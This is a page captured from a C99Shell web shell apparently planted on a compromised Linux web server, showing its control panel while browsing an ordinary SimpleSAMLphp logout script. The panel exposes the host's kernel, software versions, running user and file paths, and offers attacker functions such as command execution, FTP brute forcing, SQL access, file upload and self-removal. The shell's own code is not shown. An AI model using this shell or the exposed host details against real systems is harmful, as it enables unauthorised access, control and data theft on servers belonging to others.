!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/apex_tdfonline/php/3ros/simplesamlphp/modules/core/www/idp/   drwxr-xr-x
Free 14.16 GB of 61.93 GB (22.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     logout-iframe-done.php (1.77 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

if (!isset($_REQUEST['id'])) {
    throw new 
SimpleSAML_Error_BadRequest('Missing required parameter: id');
}
$id = (string)$_REQUEST['id'];

$state SimpleSAML_Auth_State::loadState($id'core:Logout-IFrame');
$idp SimpleSAML_IdP::getByState($state);

$associations $idp->getAssociations();

if (!isset(
$_REQUEST['cancel'])) {
    
SimpleSAML_Logger::stats('slo-iframe done');
    
SimpleSAML_Stats::log('core:idp:logout-iframe:page', array('type' => 'done'));
    
$SPs $state['core:Logout-IFrame:Associations'];
} else {
    
/* User skipped global logout. */
    
SimpleSAML_Logger::stats('slo-iframe skip');
    
SimpleSAML_Stats::log('core:idp:logout-iframe:page', array('type' => 'skip'));
    
$SPs = array(); /* No SPs should have been logged out. */
    
$state['core:Failed'] = TRUE/* Mark as partial logout. */
}

/* Find the status of all SPs. */
foreach ($SPs as $assocId => &$sp) {

    
$spId 'logout-iframe-' sha1($assocId);

    if (isset(
$_REQUEST[$spId])) {
        
$spStatus $_REQUEST[$spId];
        if (
$spStatus === 'completed' || $spStatus === 'failed') {
            
$sp['core:Logout-IFrame:State'] = $spStatus;
        }
    }

    if (!isset(
$associations[$assocId])) {
        
$sp['core:Logout-IFrame:State'] = 'completed';
    }

}


/* Terminate the associations. */
foreach ($SPs as $assocId => $sp) {

    if (
$sp['core:Logout-IFrame:State'] === 'completed') {
        
$idp->terminateAssociation($assocId);
    } else {
        
SimpleSAML_Logger::warning('Unable to terminate association with ' var_export($assocIdTRUE) . '.');
        if (isset(
$sp['saml:entityID'])) {
            
$spId $sp['saml:entityID'];
        } else {
            
$spId $assocId;
        }
        
SimpleSAML_Logger::stats('slo-iframe-fail ' $spId);
        
SimpleSAML_Stats::log('core:idp:logout-iframe:spfail', array('sp' => $spId));
        
$state['core:Failed'] = TRUE;
    }

}


/* We are done. */
$idp->finishLogout($state);

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 1.4857 ]--